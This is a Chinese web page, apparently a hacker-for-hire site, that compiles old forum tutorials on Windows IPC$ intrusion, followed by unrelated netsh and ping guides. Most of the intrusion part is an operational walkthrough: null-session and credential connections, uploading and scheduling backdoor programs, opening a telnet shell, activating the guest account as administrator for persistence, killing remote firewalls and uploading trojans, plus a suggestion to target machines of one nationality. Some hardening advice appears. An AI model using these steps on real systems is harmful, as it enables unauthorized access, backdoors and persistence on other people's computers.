全国最大诚信黑客接单

本文目录一览：

• 1、黑客DOS命令或其它命令入侵他人电脑的具体步骤?
• 2、ipc入侵方法
• 3、1、使用netsh命令进行以下操作。 a)使程序myprogram.exe能访问10.0.0.0、192.168.0.0以及221.1.12.0网络范
• 4、Pring命令如何使用
• 5、hacknet游戏输入probc后出现 no command怎么玩
• 6、*********************************************

黑客DOS命令或其它命令入侵他人电脑的具体步骤?

IPC$入侵

一 唠叨一下：

网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄.

不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少).

因此我写了这篇相当于解惑的教程.想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!如果你看完这篇帖子仍有疑问,请马上回复!

二 什么是ipc$

IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的)，它是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。

利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的)，而利用这个空的连接，连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。

我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。

所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$，访问共享资源,导出用户列表,并使用一些字典工具，进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的.

解惑:

1)IPC连接是Windows NT及以上系统中特有的远程网络登陆功能，其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数，所以不能在Windows 9.x中运行。

也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的)

2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接

3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表

三 建立ipc$连接在hack攻击中的作用

就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,what u want,u can do!!

(基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server，还可以考虑开启终端服务方便控制.怎么样?够厉害吧!)

不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的:(

因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接.

所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在.

四 ipc$与空连接,139,445端口,默认共享的关系

以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)

1)ipc$与空连接:

不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.

许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).

2)ipc$与139,445端口:

ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.

3)ipc$与默认共享

默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)

五 ipc$连接失败的原因

以下5个原因是比较常见的:

1)你的系统不是NT或以上操作系统;

2)对方没有打开ipc$默认共享

3)对方未开启139或445端口(惑被防火墙屏蔽)

4)你的命令输入有误(比如缺少了空格等)

5)用户名或密码错误(空连接当然无所谓了)

另外,你也可以根据返回的错误号分析原因：

错误号5，拒绝访问 ： 很可能你使用的用户不是管理员权限的，先提升权限；

错误号51，Windows 无法找到网络路径 : 网络有问题；

错误号53，找不到网络路径 ： ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）；

错误号67，找不到网络名 ： 你的lanmanworkstation服务未启动；目标删除了ipc$；

错误号1219，提供的凭据与已存在的凭据集冲突 ： 你已经和对方建立了一个ipc$，请删除再连。

错误号1326，未知的用户名或错误密码 ： 原因很明显了；

错误号1792，试图登录，但是网络登录服务没有启动 ： 目标NetLogon服务未启动。（连接域控会出现此情况）

错误号2242，此用户的密码已经过期 ： 目标有帐号策略，强制定期要求更改密码。

关于ipc$连不上的问题比较复杂，除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就靠大家自己体会和试验了.

六 如何打开目标的IPC$(此段引自相关文章)

首先你需要获得一个不依赖于ipc$的shell，比如sql的cmd扩展、telnet、木马,当然，这shell必须是admin权限的,然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上面可以知道，ipc$能否使用还有很多条件。请确认相关服务都已运行，没有就启动它（不知道怎么做的请看net命令的用法）,还是不行的话（比如有防火墙，杀不了）建议放弃。

七 如何防范ipc$入侵

1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)

首先运行regedit，找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为：00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)

2禁止默认共享

1）察看本地共享资源

运行-cmd-输入net share

2）删除共享(每次输入一个）

net share ipc$ /delete

net share admin$ /delete

net share c$ /delete

net share d$ /delete（如果有e,f,……可以继续删除）

3）停止server服务

net stop server /y （重新启动后server服务会重新开启）

4）修改注册表

运行-regedit

server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer（DWORD）的键值改为:00000000。

pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks（DWORD）的键值改为:00000000。

如果上面所说的主键不存在，就新建(右击-新建-双字节值）一个主健再改键值。

3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务

控制面板-管理工具-服务-找到server服务（右击）-属性-常规-启动类型-已禁用

4安装防火墙(选中相关设置)，或者端口过滤(滤掉139,445等),或者用新版本的优化大师

5设置复杂密码，防止通过ipc$穷举密码

（本教程不定期更新，欲获得最新版本，请登陆官方网站：菜菜鸟社区原创）

八 相关命令

1)建立空连接:

net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)

2)建立非空连接:

net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)

3)映射默认共享:

net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘，其他盘类推)

如果已经和目标建立了ipc$，则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$

4)删除一个ipc$连接

net use \\IP\ipc$ /del

5)删除共享映射

net use c: /del 删除映射的c盘，其他盘类推

net use * /del 删除全部,会有提示要求按y确认

九 经典入侵模式

这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)

1. C:\net use \\127.0.0.1\IPC$ "" /user:"admintitrators"

这是用《流光》扫到的用户名是administrators，密码为"空"的IP地址(空口令?哇,运气好到家了)，如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以第一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。

2. C:\copy srv.exe \\127.0.0.1\admin$

先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。

3. C:\net time \\127.0.0.1

查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。

4. C:\at \\127.0.0.1 11:05 srv.exe

用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！）

5. C:\net time \\127.0.0.1

再查查到时间没有？如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备开始下面的命令。

6. C:\telnet 127.0.0.1 99

这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了

7.C:\copy ntlm.exe \\127.0.0.1\admin$

用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。

8. C:\WINNT\system32ntlm

输入ntlm启动（这里的C:\WINNT\system32指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现"DONE"的时候，就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务！

9. Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组

10. C:\net user guest /active:yes

将对方的Guest用户激活

11. C:\net user guest 1234

将Guest的密码改为1234,或者你要设定的密码

12. C:\net localgroup administrators guest /add

将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机)

十 总结:

关于ipc入侵就说这么多了,觉得已经够详细了,如果有不准确的地方,希望能与大家讨论.

最后,希望大家不要随便入侵,我写这篇文章的目的是想解答大家的疑惑,并不是鼓励大家随便的入侵,如果你非想试一下,建议拿小日本的机子开练(什么?为什么?因为我讨厌日本,没别的)

ipc入侵方法

关于ipc$、空连接和默认共享

简单说明：

首先需要指出的是空连接和ipc$是不同的概念。空连接是在没有信任的情况下与服务器建立的会话，换句话说，它是一个到服务器的匿名访问。ipc$是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限。有许多的工具必须用到ipc$。默认共享是为了方便远程管理而开放的共享，包含了所有的逻辑盘（c$,d$,e$……）和系统目录winnt或windows（admin$）。

相关帖子：

尝试自己解决问题的学习思路

IPC进攻方法 ;topic=2498show=1034

常见问题和回答：

1，怎样建立空连接，它有什么用？

答：使用命令 net use \IPipc$ "" /user:"" 就可以简单地和目标建立一个空连接（需要目标开放ipc$）。

对于NT，在默认安全设置下，借助空连接可以列举目标用户、共享，访问everyone权限的共享，访问小部分注册表等，没有什么利用价值。对2000作用就更小了。而且实现也不方便，需借助工具。如果你不理解“没用”的东西为什么还会存在，就看看“专业”的解释吧：

在NT/2000下的空连接 ;RootID=3424ID=3424page=1：

解剖WIN2K下的空会话

2，为什么我连不上IPC$？

答：1，只有nt/2000/xp及以上系统才可以建立ipc$。如果你用的是98/me是没有该功能的。

2，确认你的命令没有打错。正确的命令是： net use \目标IPipc$ "密码"/user:"用户名"

注意别多了或少了空格。当用户名和密码中不包含空格时两边的双引号可以省略。空密码用""表示。

3，根据返回的错误号分析原因：

错误号5，拒绝访问 ：很可能你使用的用户不是管理员权限的，先提升权限；

错误号51，Windows 无法找到网络路径 : 网络有问题；

错误号53，找不到网络路径 ： ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）；

错误号67，找不到网络名 ：你的lanmanworkstation服务未启动；目标删除了ipc$；

错误号1219，提供的凭据与已存在的凭据集冲突 ： 你已经和对方建立了一个ipc$，请删除再连。

错误号1326，未知的用户名或错误密码 ： 原因很明显了；

错误号1792，试图登录，但是网络登录服务没有启动 ： 目标NetLogon服务未启动。（连接域控会出现此情况）

错误号2242，此用户的密码已经过期： 目标有帐号策略，强制定期要求更改密码。

4，关于ipc$连不上的问题比较复杂，本论坛没有总结出一个统一的认识，我在肉鸡上实验有时会得出矛盾的结论，十分棘手。

而且知道了问题所在，如果没有用其他办法获得shell，很多问题依然不能解决。问题过于细致后就不适合在本文章里探讨了。

各位看着办吧，呵呵。

3，怎样打开目标的IPC$？

答：首先你需要获得一个不依赖于ipc$的shell，比如sql的cmd扩展、telnet、木马。当然，这shell必须是admin权限的。然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上一问题可以知道，ipc$能否使用还有很多条件。请确认相关服务都已运行，没有就启动它（不知道怎么做的请看net命令的用法）。还是不行的话（比如有防火墙，杀不了）建议放弃。

4，怎样映射和访问默认共享？

答：使用命令 net use z: \目标IPc$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘，其他盘类推。

如果已经和目标建立了ipc$，则可以直接用IP加盘符加$访问。比如 copymuma.exe \IPd$pathmuma.exe 。或者再映射也可以，只是不用用户名和密码了：netuse y: \IPd$ 。然后 copy muma.exe y:pathmuma.exe 。当路径中包含空格时，须用""将路径全引住。

5，如何删除映射和ipc$连接？

答：用命令 net use \IPipc$ /del 删除和一个目标的ipc$连接。

用命令 net use z: /del 删除映射的z盘，其他盘类推。

用命令 net use * /del 删除全部。会有提示要求按y确认。

6，连上ipc$然后我能做什么？

答：能使用管理员权限的帐号成功和目标连接ipc$，表示你可以和对方系统做深入“交流”了。你可以使用各种命令行方式的工具（比如pstools系列、Win2000SrvReskit、telnethack等）获得目标信息、管理目标的进程和服务等。如果目标开放了默认共享（没开你就帮他开），你就可以上传木马并运行。也可以用tftp、ftp的办法上传。像dwrcc、VNC、RemoteAdmin等工具（木马）还具有直接控屏的功能。如果是2000server，还可以考虑开启终端服务方便控制。这里提到的工具的使用，请看自带的说明或相关教程。

7，怎样防止别人用ips$和默认共享入侵我？

答：A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。

1，先把已有的删除

net share ipc$ /del

net share admin$ /del

net share c$ /del

…………（有几个删几个）

2，禁止建立空连接

首先运行regedit，找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把RestrictAnonymous（DWORD）的键值改为：00000001。

3，禁止自动打开默认共享

对于server版，找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareServer（DWORD）的键值改为:00000000。

对于pro版，则是[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareWks（DWORD）的键值改为:00000000。

B、另一种是关闭ipc$和默认共享依赖的服务（不推荐）

net stop lanmanserver

可能会有提示说，XXX服务也会关闭是否继续。因为还有些次要的服务依赖于lanmanserver。一般情况按y继续就可以了。

C、最简单的办法是设置复杂密码，防止通过ipc$穷举密码。但如果你有其他漏洞，ipc$将为进一步入侵提供方便。

D、还有一个办法就是装防火墙，或者端口过滤。防火墙的方法就不说了

---------------------------ipc$漏洞

冲击波利用ipc$，震荡波rpc$漏洞

139.135.445端口

------------------------------

部分城市的网络供应商（isp）屏蔽啦139.445.135端口。ipc$连接失败的原因

ipc$ 连接失败后经常看一些入侵相关文章的朋友不难发现，好像大部分的入侵都非要用到ipc$连接（事实上并不是这样），而在许多安全杂志上一提到入侵，无论是在去取得administrator之前，还是在拿到了administrator之后上传工具，都在频繁的使用到了ipc$。这似乎是一个很大的缺口，看别人说的好像容易的就像用冰河一样，但事实上，大部分管理员根本不会给你这种机会，让你去用ipc$为所欲为，管理员会想尽一切办法屏蔽掉这个众人皆知的漏洞。傻子才会开着共享，等着你去黑呢~~所以也就出现了很多朋友抱怨ipc$连不上，或者什么什么号错误。从而大大打击了我们学习黑客的热情。我今天就想和大家一起来看一下ipc$失败的原因和解决的方法。

什么是ipc￥？

我们最好先来看一下什么是ipc￥连接。ipc（internet process connection）是远程网络连接。而ipc$,admin$,c$,d$,e$这些则是winnt和win2000的默认共享。ipc$就是一种管道通讯，它在两个ip间建立一个连接。我们一般看到对方主机开了139,445，我们一般就说对方开了共享。就可以尝试用ipc￥连接。net net use \\远程的ip\ipc$"password" \user:"username"[如图1]

说明：这种功能只在winnt和win2000种才有，windows98是没有的。很多朋友对ipc￥连接的概念很混淆，我在这里罗嗦几句，ipc￥连接分为ipc$空连接和带有一定权限ipc$连接，这两者可是大大的不一样,许多朋友在建立了空连接之后，就着急的想copy工具上去，这是肯定会报错的[如图2]，其实这也是很多朋友经常碰到的问题。因为这是空连接，没有任何的权限(就好像匿名访问一样），除了可以得到远程主机的netbios信息外，什么命令都执行不了。

而可以复制文件是你获得了一定的权限后，比如说你得到一个管理员密码是空口令，也就是带有一定权限的ipc$连接，空连接只是简单的和远程主机建立了一个通讯的管道。是不是什么用都没有呢？当然不是了，我们可以用暴力破解的方法来得到管理员的密码，就是挂上字典不断地进行对ipc$空连接的试探，从而达到取得管理员密码的目的，最有名的工具就是小榕的smbcrack.因为不是这次我们说的重点，所以如果大家感兴趣可以自己到我们的论坛)看相关文章.

到这里我已经对ipc￥空连接和带有一定权限ipc$连接有了一个比较清楚的了解。好了，现在我们来自己分析一下ipc$常见的失败原因，我们要用到的只是一台虚拟机，或者你有自己的肉鸡，或者局域网。我在这里选择虚拟机（原因很简单：省钱~~~别打我）。

1、错误1326

我们用命令net use \\192.168.60.128\ipc$ "12345" /user:"admaninistrator"进行连接，[如图3]报系统发生1326错误，登陆失败：未知用户名或密码错误。这个错误很常见哦~~~，我们检查一下我们的命令，发现原来是用户名输入错误。（也可能是你的密码输入错误）

3、错误53

再次输入net use \\192.168.60.128\ipc$ "12345" /user:"admninistrator"，报系统发生错误53错误[如图4]，找不到网络名。刚才试找不到路径，现在是找不到网络名。我们在进肉鸡看一下，查看一下系统进程，原来远程主机（虚拟机）开了防火墙。我们杀掉这个进程。看一下，连接成功了！

2、错误67

这也是我们经常碰到的，让我们许多刚上路的黑友郁闷不已，我们来试一下，输入命令net use \\192.168.60.128\ipc$ "12345" /user:"admninistrator"报系统发生错误67错误[如图5]，找不到网络路径。我们需要进入我们的虚拟机看一下，查看一下共享，原来是没开共享，难怪找不到路径。[如图6] 我们可以用net share 打开共享。这样就可以了，不会报错了。

解决方法

我们现在已经了解了ipc$失败的原因，我们知道稍微有一点安全意识的网络管理员都会关闭掉共享，不会给你机会用简单的ipc$连接进入他的机子，而如果他屏蔽掉了ipc$共享并且开了很少的服务（或者根本禁止了许多可以利用的服务），就算你通过某种方法比如说溢出攻击，得到了权限，进入了系统，这时你添加一个账号也没什么意义。想用ipc$连接上传工具，却发现连续的报错，错误1326和错误67比较简单，容易对付。如果碰到对方开了防火墙，也就是(错误67)，远程连接不上，我们怎么办呢？这里提供几种办法，

1、杀掉远程主机中的防火墙，如果对方安装了resouce kit 那么我们就可以用tlist 和kill 两个命令来找到并且杀掉防火墙的进程。

2、利用tftp。并不是说有的管理员都安装了resouce kit,那我们怎么办呢？我们知道2000是自带的tftp，我们可以用tftp来上传工具，如tlist 、kill等等，然后关闭防火墙和杀毒软件

3、利用自己的ftp。我们还可以自己驾一个ftp服务器，然后用远程的计算机反过来ftp我们自己的机子，达到上传工具的目的。然后杀掉进程...（其实已经没必要了）剩下的就随你的便了。

其实这篇文章没什么技术性可言，只是针对网上朋友们经常提的一些问题作一个总结性的回答。希望能给初学者带来一些方便，还有就是希望初学者能明白，许多事情最好自己试着去做一下，不要光是提问，因为在这个领域内没有什么人可以真正的帮助，只有你自己！！黑客是什么？？不管你问多少人，回答只有一个：黑客是一种精神，一种自我钻研的

=========================C:\net use \\192.168.0.8\ipc$ "sa" /user:administrator

命令成功完成。

C:\net use W: \\192.168.0.8\c$ "sa" /user:administrator

命令成功完成。

C:\dir w

驱动器 C 中的卷是 win003

卷的序列号是 3C7D-5090C:\ 的目录找不到文件C:\dir w:

驱动器 W 中的卷没有标签。

卷的序列号是 BC42-1D99W:\ 的目录2006-12-12 18:12 DIR airs

2006-12-01 16:36 0 AUTOEXEC.BAT

2006-12-01 16:36 0 CONFIG.SYS

2006-12-01 17:04 DIR Documents and Settings

2006-12-26 14:36 DIR Program Files

2006-12-12 18:02 DIR TDdownload

2006-12-12 18:28 DIR tools_jc

2006-12-14 12:09 DIR WINDOWS

2006-12-01 16:40 DIR wmpub

2 个文件 0 字节

7 个目录 4,431,769,600 可用字节------------------------原始文档：

创建时间：2003-03-16

浏览次数：5600

原创：iqst (papabang_at_qingdaonews.com)

来源：菜菜鸟社区htt://pccbirds.yeah.net

一份详尽的IPC$入侵资料-----------------------------经过整理手头的资料而成，并非原创，不过带着汗水，往转贴时注明出处

1、使用netsh命令进行以下操作。 a)使程序myprogram.exe能访问10.0.0.0、192.168.0.0以及221.1.12.0网络范

netsh命令介绍方案

( 这个blog系统自动把windows的路径分隔符号右斜线自动屏蔽了，我只好用／代替。阅读时候请注意）

netsh 是windows系统本身提供的功能强大的网络配置命令行工具。导出配置脚本: netsh -c interface ip dump c:/interface.txt 导入配置脚本: netsh -f c:/interface.txt 进入netsh环境后，在根级目录用exec命令也可以加载一个配置脚本。还有对wins、route、ras等网络服务的配置也可以通过Netsh的内置命令操作。下面是配置示例：

C:/Documents and Settings/Administratornetsh /?用法: netsh [-a AliasFile] [-c Context] [-r RemoteMachine] [-u [DomainName]UserName] [-p Password | *] [Command | -f ScriptFile]下列指令有效:此上下文中的命令:? - 显示命令列表。aaaa - 更改到 `netsh aaaa' 上下文。add - 在项目列表上添加一个配置项目。delete - 在项目列表上删除一个配置项目。dhcp - 更改到 `netsh dhcp' 上下文。diag - 更改到 `netsh diag' 上下文。dump - 显示一个配置脚本。exec - 运行一个脚本文件。help - 显示命令列表。interface - 更改到 `netsh interface' 上下文。ipsec - 更改到 `netsh ipsec' 上下文。ras - 更改到 `netsh ras' 上下文。routing - 更改到 `netsh routing' 上下文。rpc - 更改到 `netsh rpc' 上下文。set - 更新配置设置。show - 显示信息。wins - 更改到 `netsh wins' 上下文。下列的子上下文可用: aaaa dhcp diag interface ipsec ras routing rpc wins家庭网络自动配置：home.cmd ip-home.txt home.cmd:@echo offecho. echo ************ Ip切换器 By 蒋进平 ************echo. echo 正在设置成家庭网络IP，请稍等 . . . netsh -f c:/iphome.txtecho 设置成功，现在可以使用家庭网络了echo.echo ************ 2004 年 8 月 30 号 ************echo. pauseexitip-home.txt :# ----------------------------------# 接口 IP 配置# ----------------------------------pushd interface ip# "本地连接" 的接口 IP 配置set address name="本地连接" source=static addr=192.168.0.10 mask=255.255.255.0set address name="本地连接" gateway=192.168.0.1 gwmetric=0set dns name="本地连接" source=static addr=211.99.129.210 register=NONEadd dns name="本地连接" addr=211.99.129.211 index=2set wins name="本地连接" source=static addr=nonepopd# 接口 IP 配置结束

Netsh 概述

Netsh 是命令行脚本实用工具，它允许从本地或远程显示或修改当前正在运行的计算机的网络配置。Netsh 还提供了一个脚本功能，对于指定计算机，可以通过此功能以批处理模式运行一组命令。为了存档或配置其他服务器，Netsh 也可以将配置脚本保存在文本文件中。

netsh命令的强大没有人会怀疑，有经验的管理员都会深深会到这一点;以前有很多介绍netsh命令的文章，今天我们从另一方面感受一下netsh命令的神奇。

笔者管理学校的两个机房，每个机房有50台机器，每台机器都装有还原卡，每次重启系统都会自动还原;拉了条ADSL通过ISA上网，学校规定，学生帐号登陆不能上网，而老师通过自己帐号登陆则可以上网;机房白天一般都是学生上课用，晚上留给老师上网查资料。

要完成学校的任务还真有点困难，大家都知道实现上网权限的控制，大多情况下都是通过IP地址来实现(当然，ISA在AD的支持下是可以通过帐户来实现上网权限的控制，这不是本文讨论范围内)，也就是说如果老师要internet的话，就必须通过网上邻居属性更改计算机的IP地址，一百来台机器，如果要我一个人每天手动更改，那还不要我命;如果让那些菜鸟老师更改，还不如杀了我，都教了N次了，还是不会。。。netsh可帮了大忙，下面我们来领略一下他的神奇。

网络环境:win2ks+isa2k 做上网服务器

IP:192.168.0.1,subnetmask::255.255.255.0,DNS为ISP的DNS IP:202.101.10.10

客户机全部win2kpro IP:192.168.0.2---192.168.0.102 subnetmask:255.255.255.0 网关和DNS都为代理服务器的IP:192.168.0.1并且都装了ISA的防火墙客户端软件。

在默认情况下，客户机是全部不能上internet的，ISA的规则上是禁止192.168.0.2---192.168.0.102的IP上internet,另外在ISA再创建一规则，允许192.168.0.103-192.168.0.203上internet (这不是本文的重点，如果有需要，大家可以查看相关资料)。

现在netsh派上用场了，我们客户机PC18上运行CMD进入MS-DOS，输入

netsh interface ip dump c:\pc1.txt

该命令是显示当前”本地连接" 的接口IP 配置,并保存在pc1.txt文本文件中

我查看一下c:\pc1.txt这个文件

显示的是当前”本地连接”的接口的IP配置,我们用命令ipconfig/all看看当前接口的配置是否和pc1.txt这个文件一样

可以看到两者是一样的.我们打开PC1.TXT这个文件,把”set address name = "本地连接" source = static addr = 192.168.0.18”的IP 192.168.0.18改为192.168.0.118,再保存.然后,我们用记事本新建一个文件,输入netsh -f c:\pc1.txt

注意文件的路径,我们刚才是把pc1.txt放在C盘根目录下,另存为ip.bat,并放在老师帐户的桌面上,并授予老师帐户读取和运行的权限,别的帐户为禁止

.老师用自己的帐户登陆后,双击桌面上的ip.bat图标后,我们用ipconfig/all看看结果

显示IP地址换成192.168.0.118了,别的配置都没有变,可以和图3比较一下.我们知道192.168.0.103―192.168.0.203的IP地址是可以上网的.也就是说,如果老师想上网的话,只要双击IP.BAT这个文件就可以了;以上的设置是在PC18这台机器上做的,如果我们要在别的机器上设置,我们只在把PC1.TXT这个文件的里的IP地址换成192.168.0.103-192.168.0.203范围内的IP(当然要保证使用的IP是唯一的,以免产生IP冲突),再新建一个ip.bat文件,内容可以一样,不过要注意pc1.txt这个文件的路径;补允一点,老师帐户都为管理员组,学生帐户为普通用户组。

通过以上设置,基本上达到我们的目的,老师晚上上机的时候,只要双击桌面上ip.bat这个文件,IP地址就会换成192.168.0.103―192.168.0.203这个网段的IP,也就是说可以上网了,第二天电脑重启,因为有还原卡,机器又会被变成192.168.0.2―192.168.0.102这个网段的IP,也就不能上网了.通过netsh这个命令,我们能感觉到他的强大,可以为我们免去一些烦锁的事情。

Pring命令如何使用

PRING ？

应该是PING 吧？

ping命令详解

对于Windows下ping命令相信大家已经再熟悉不过了，但是能把ping的功能发挥到最大的人却并不是很多，当然我也并不是说我可以让ping发挥最大的功能，我也只不过经常用ping这个工具，也总结了一些小经验，现在和大家分享一下。

现在我就参照ping命令的帮助说明来给大家说说我使用ping时会用到的技巧，ping只有在安装了TCP/IP协议以后才可以使用：

ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list] | [-k computer-list]] [-wz timeout] destination-list

Options:

-t Ping the specified host until stopped.To see statistics and continue - type Control-Break;To stop - type Control-C.

不停的ping地方主机，直到你按下Control-C。

此功能没有什么特别的技巧，不过可以配合其他参数使用，将在下面提到。

-a Resolve addresses to hostnames.

解析计算机NetBios名。

示例：C:＼ping -a 192.168.1.21

Pinging iceblood.yofor.com [192.168.1.21] with 32 bytes of data:

Reply from 192.168.1.21: bytes=32 time10ms TTL=254

Reply from 192.168.1.21: bytes=32 time10ms TTL=254

Reply from 192.168.1.21: bytes=32 time10ms TTL=254

Reply from 192.168.1.21: bytes=32 time10ms TTL=254

Ping statistics for 192.168.1.21:

Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds:

Minimum = 0ms, Maximum = 0ms, Average = 0ms

从上面就可以知道IP为192.168.1.21的计算机NetBios名为iceblood.yofor.com。

-n count Number of echo requests to send.

发送count指定的Echo数据包数。

在默认情况下，一般都只发送四个数据包，通过这个命令可以自己定义发送的个数，对衡量网络速度很有帮助，比如我想测试发送50个数据包的返回的平均时间为多少，最快时间为多少，最慢时间为多少就可以通过以下获知：

C:＼ping -n 50 202.103.96.68

Pinging 202.103.96.68 with 32 bytes of data:

Reply from 202.103.96.68: bytes=32 time=50ms TTL=241

Reply from 202.103.96.68: bytes=32 time=50ms TTL=241

Reply from 202.103.96.68: bytes=32 time=50ms TTL=241

Request timed out.

………………

Reply from 202.103.96.68: bytes=32 time=50ms TTL=241

Reply from 202.103.96.68: bytes=32 time=50ms TTL=241

Ping statistics for 202.103.96.68:

Packets: Sent = 50, Received = 48, Lost = 2 (4% loss),Approximate round trip times in milli-seconds:

Minimum = 40ms, Maximum = 51ms, Average = 46ms

从以上我就可以知道在给202.103.96.68发送50个数据包的过程当中，返回了48个，其中有两个由于未知原因丢失，这48个数据包当中返回速度最快为40ms，最慢为51ms，平均速度为46ms。

-l size Send buffer size.

定义echo数据包大小。

